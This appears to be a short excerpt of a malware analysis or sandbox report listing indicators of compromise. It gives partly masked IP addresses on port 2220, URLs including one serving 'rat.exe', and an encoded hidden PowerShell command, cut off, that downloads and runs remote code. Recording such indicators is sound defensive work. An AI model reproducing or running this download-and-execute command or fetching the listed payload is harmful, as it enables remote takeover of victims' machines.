Technical Information
- http://14#.##.80.151:2220/login
- <SYSTEM32>\rundll32.exe
- '14#.#8.80.151':2220
- http://14#.##.80.151:2220/login via 14#.#8.80.151
- http://14#.##.80.151:2220/r via 14#.#8.80.151
- http://14#.##.80.151:2220/bin/rat.exe via 14#.#8.80.151
- '<SYSTEM32>\rundll32.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -w 1 -e aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADQAMQA...